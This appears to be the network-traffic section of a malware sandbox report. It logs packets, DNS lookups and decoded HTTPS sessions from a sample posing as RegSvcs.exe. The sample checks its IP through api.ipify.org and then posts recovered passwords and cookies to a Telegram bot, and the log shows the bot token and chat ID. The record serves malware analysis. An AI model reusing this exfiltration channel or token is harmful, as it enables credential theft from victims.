                                                                                      Dec 6, 2024 05:54:18.081866980 CET50029443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:18.081881046 CET44350029149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:19.447807074 CET44350029149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:19.447901964 CET50029443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:19.449810982 CET50029443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:19.449820995 CET44350029149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:19.450072050 CET44350029149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:19.451559067 CET50029443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:19.499331951 CET44350029149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:19.801927090 CET50029443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:19.801961899 CET44350029149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:19.802155972 CET50029443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:19.802175999 CET44350029149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:19.802395105 CET50029443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:19.802402973 CET44350029149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:20.070420980 CET44350029149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:20.211096048 CET50029443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:20.669238091 CET44350029149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:20.669306040 CET50029443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:20.669641972 CET50029443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:20.669677019 CET44350029149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:20.669720888 CET50029443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:22.783708096 CET50030443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:22.783742905 CET44350030149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:22.783816099 CET50030443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:22.784089088 CET50030443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:22.784097910 CET44350030149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:24.151177883 CET44350030149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:24.151242018 CET50030443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:24.153079033 CET50030443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:24.153093100 CET44350030149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:24.153291941 CET44350030149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:24.154653072 CET50030443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:24.195332050 CET44350030149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:24.504858017 CET50030443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:24.504879951 CET44350030149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:24.504985094 CET50030443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:24.504996061 CET44350030149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:24.505090952 CET50030443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:24.505156040 CET44350030149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:24.864517927 CET44350030149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:24.926299095 CET50030443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:25.408341885 CET44350030149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:25.409893036 CET50030443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:25.410568953 CET44350030149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:25.410598040 CET50030443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:25.410621881 CET44350030149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:25.410646915 CET50030443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:25.410725117 CET50030443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:30.026268959 CET50031443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:30.026320934 CET44350031149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:30.026381016 CET50031443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:30.026824951 CET50031443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:30.026839018 CET44350031149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:31.388772011 CET44350031149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:31.391350031 CET50031443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:31.391376972 CET44350031149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:31.739043951 CET50031443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:31.739073038 CET44350031149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:31.741992950 CET50031443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:31.742012024 CET44350031149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:31.745908976 CET50031443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:31.745923996 CET44350031149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:32.013359070 CET44350031149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:32.066934109 CET50031443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:32.378145933 CET50031443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:32.378220081 CET44350031149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:32.378288031 CET50031443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:32.378462076 CET50032443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:32.378501892 CET44350032149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:32.378567934 CET50032443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:32.378850937 CET50032443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:32.378865004 CET44350032149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:33.753768921 CET44350032149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:33.753853083 CET50032443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:33.757996082 CET50032443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:33.758008003 CET44350032149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:33.758259058 CET44350032149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:33.762260914 CET50032443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:33.807338953 CET44350032149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:34.114193916 CET50032443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:34.114224911 CET44350032149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:34.114326000 CET50032443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:34.114341021 CET44350032149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:34.114413977 CET50032443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:34.114500046 CET44350032149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:34.376039982 CET44350032149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:34.426317930 CET50032443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:35.057748079 CET44350032149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:35.060237885 CET44350032149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:35.060276985 CET50032443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:35.063819885 CET50032443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:35.063832045 CET44350032149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:35.063855886 CET50032443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:35.067822933 CET50032443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:36.812697887 CET50033443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:36.812748909 CET44350033149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:36.812854052 CET50033443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:36.813155890 CET50033443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:36.813169956 CET44350033149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:37.512053967 CET50033443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:37.559339046 CET44350033149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:37.559379101 CET50034443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:37.559422970 CET44350034149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:37.559516907 CET50034443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:37.560669899 CET50034443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:37.560683966 CET44350034149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:38.174576998 CET44350033149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:38.174635887 CET50033443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:38.924422026 CET44350034149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:38.924556017 CET50034443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:38.926028013 CET50034443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:38.926040888 CET44350034149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:38.926244020 CET44350034149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:38.931289911 CET50034443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:38.971338034 CET44350034149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:39.285974979 CET50034443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:39.286005974 CET44350034149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:39.286134958 CET50034443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:39.286158085 CET44350034149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:39.286273003 CET50034443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:39.286289930 CET44350034149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:39.547866106 CET44350034149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:39.598211050 CET50034443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:40.223453045 CET44350034149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:40.223525047 CET50034443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:40.224968910 CET50034443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:40.225008965 CET44350034149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:40.225058079 CET50034443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:53.516629934 CET50035443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:53.516695023 CET44350035149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:53.516807079 CET50035443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:53.517102003 CET50035443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:53.517117977 CET44350035149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:54.897671938 CET44350035149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:54.897805929 CET50035443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:54.942039013 CET50035443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:54.942070961 CET44350035149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:54.942332983 CET44350035149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:54.943636894 CET50035443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:54.987334967 CET44350035149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:55.304466963 CET50035443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:55.304512978 CET44350035149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:55.304692030 CET50035443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:55.304709911 CET44350035149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:55.304810047 CET50035443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:55.304830074 CET44350035149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:55.520001888 CET44350035149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:55.567357063 CET50035443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:56.221352100 CET44350035149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:56.221404076 CET50035443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:56.222073078 CET50035443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:56.222104073 CET44350035149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:56.222166061 CET50035443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:59.282866001 CET50036443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:59.282927036 CET44350036149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:54:59.283010006 CET50036443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:59.283340931 CET50036443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:54:59.283358097 CET44350036149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:55:00.649674892 CET44350036149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:55:00.649749041 CET50036443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:55:00.651756048 CET50036443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:55:00.651766062 CET44350036149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:55:00.652000904 CET44350036149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:55:00.653196096 CET50036443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:55:00.695333958 CET44350036149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:55:01.272263050 CET44350036149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:55:01.411870956 CET50036443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:55:02.121041059 CET50036443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:55:02.121087074 CET44350036149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:55:02.123936892 CET50036443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:55:02.123956919 CET44350036149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:55:02.124043941 CET50036443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:55:02.124080896 CET44350036149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:55:02.200592995 CET50037443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:55:02.200630903 CET44350037149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:55:02.200706005 CET50037443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:55:02.203114986 CET50037443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:55:02.203123093 CET44350037149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:55:03.052175045 CET44350036149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:55:03.052252054 CET50036443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:55:03.052562952 CET50036443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:55:03.052597046 CET44350036149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:55:03.052788019 CET44350036149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:55:03.052839994 CET50036443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:55:03.052855968 CET50036443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:55:03.604803085 CET44350037149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:55:03.604862928 CET50037443192.168.2.4149.154.167.220
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 6, 2024 05:50:56.089823961 CET5565653192.168.2.41.1.1.1
                                                                                      Dec 6, 2024 05:50:56.227305889 CET53556561.1.1.1192.168.2.4
                                                                                      Dec 6, 2024 05:50:58.455792904 CET5437553192.168.2.41.1.1.1
                                                                                      Dec 6, 2024 05:50:58.592763901 CET53543751.1.1.1192.168.2.4
                                                                                      Dec 6, 2024 05:52:39.065028906 CET5082953192.168.2.41.1.1.1
                                                                                      Dec 6, 2024 05:52:39.202337027 CET53508291.1.1.1192.168.2.4
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Dec 6, 2024 05:50:56.089823961 CET192.168.2.41.1.1.10x4a81Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 05:50:58.455792904 CET192.168.2.41.1.1.10x7066Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 05:52:39.065028906 CET192.168.2.41.1.1.10xf3fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Dec 6, 2024 05:50:56.227305889 CET1.1.1.1192.168.2.40x4a81No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 05:50:56.227305889 CET1.1.1.1192.168.2.40x4a81No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 05:50:56.227305889 CET1.1.1.1192.168.2.40x4a81No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 05:50:58.592763901 CET1.1.1.1192.168.2.40x7066No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 05:52:39.202337027 CET1.1.1.1192.168.2.40xf3fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                      • api.ipify.org
                                                                                      • api.telegram.org
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.449730172.67.74.1524432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:50:57 UTC155OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                      Host: api.ipify.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-12-06 04:50:57 UTC424INHTTP/1.1 200 OK
                                                                                      Date: Fri, 06 Dec 2024 04:50:57 GMT
                                                                                      Content-Type: text/plain
                                                                                      Content-Length: 12
                                                                                      Connection: close
                                                                                      Vary: Origin
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ed9a8775a712361-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1755&min_rtt=1744&rtt_var=676&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1593016&cwnd=238&unsent_bytes=0&cid=0990a86d90b74f06&ts=449&x=0"
                                                                                      2024-12-06 04:50:57 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                                                                                      Data Ascii: 8.46.123.228


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.449732149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:50:59 UTC260OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd1587a9f4ac63
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 968
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2024-12-06 04:51:00 UTC968OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 35 38 37 61 39 66 34 61 63 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 35 38 37 61 39 66 34 61 63 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 30 35 2f 32 30 32 34 20 32 33 3a 35 30 3a 35 37 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd1587a9f4ac63Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd1587a9f4ac63Content-Disposition: form-data; name="caption"New PW Recovered!Time: 12/05/2024 23:50:57User
                                                                                      2024-12-06 04:51:00 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:51:00 UTC1141INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:51:00 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 753
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170383,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460660,"document":{"file_name":"user-610930 2024-12-05 23-50-57.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAECmY9nUoK0P3nIjEfvs3QilNtNWLdETgAC3RQAAjoemVIL2yCK-dkiGjYE","file_unique_id":"AgAD3RQAAjoemVI","file_size":347},"caption":"New PW Recovered!\n\nTime: 12/05/2024 23:50:57\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.228","caption_entities":[{"offset":178,"length":12,"type":"url"}]}}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.449734149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:51:02 UTC237OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd15a4f24f5ee0
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 6683
                                                                                      Expect: 100-continue
                                                                                      2024-12-06 04:51:02 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 35 61 34 66 32 34 66 35 65 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 35 61 34 66 32 34 66 35 65 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 30 36 2f 32 30 32 34 20 30 33 3a 32 30 3a 33 34 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd15a4f24f5ee0Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd15a4f24f5ee0Content-Disposition: form-data; name="caption"New CO Recovered!Time: 12/06/2024 03:20:34User
                                                                                      2024-12-06 04:51:02 UTC5609OUTData Raw: 68 c1 34 86 6d 64 54 9c 6d 64 3c 9d ee ac b2 6c 1b 47 4b 8c eb 3b dc 5f c6 37 27 c0 9a be 39 24 67 f1 65 df 1e 03 84 6c 49 ae 58 0a a4 31 3f a5 92 e9 51 e4 be 54 b8 48 df 5e 90 23 e6 49 e0 9a 52 27 96 07 32 41 80 2d 93 00 6a 93 b8 52 a9 58 24 e4 e7 f6 4f e4 b3 a0 42 b2 d8 6c 00 fc 4e c6 5c 16 c8 ec b5 ac 36 6b 31 20 01 79 a0 14 10 4a fb 27 8b 25 3c 91 84 27 55 63 16 84 ea 08 ae 3e 35 29 22 99 84 0d d5 2d 9b 0b 08 be 9f 2c 16 49 d4 d8 83 2b 01 6e 18 31 4b a2 ce a8 b2 ac 32 71 1a 0b 6a 36 75 65 1d c1 41 eb 98 99 98 a0 15 44 a5 07 09 00 29 0b fe 68 7c e5 3b f0 11 47 b8 d1 e9 51 91 c1 09 24 06 25 84 d4 97 83 ca b5 a3 19 a1 11 24 46 92 6d 38 2d c9 d9 f6 53 f3 7e 71 fa 88 e1 1a 18 b3 00 13 34 4a e9 ec 60 16 1f f6 23 96 4c 2a 52 ee 33 61 0b 4c 77 f8 2f 3c 97 c7
                                                                                      Data Ascii: h4mdTmd<lGK;_7'9$gelIX1?QTH^#IR'2A-jRX$OBlN\6k1 yJ'%<'Uc>5)"-,I+n1K2qj6ueAD)h|;GQ$%$Fm8-S~q4J`#L*R3aLw/<
                                                                                      2024-12-06 04:51:02 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 35 61 34 66 32 34 66 35 65 65 30 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd15a4f24f5ee0--
                                                                                      2024-12-06 04:51:02 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:51:03 UTC1147INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:51:03 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 759
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170384,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460663,"document":{"file_name":"user-610930 2024-12-06 03-20-34.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAECmZBnUoK3JHLHKJoGs_lHUHHU2LCSJAAC3hQAAjoemVJKAr5tCPDbqDYE","file_unique_id":"AgAD3hQAAjoemVI","file_size":6057},"caption":"New CO Recovered!\n\nTime: 12/06/2024 03:20:34\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.228","caption_entities":[{"offset":178,"length":12,"type":"url"}]}}


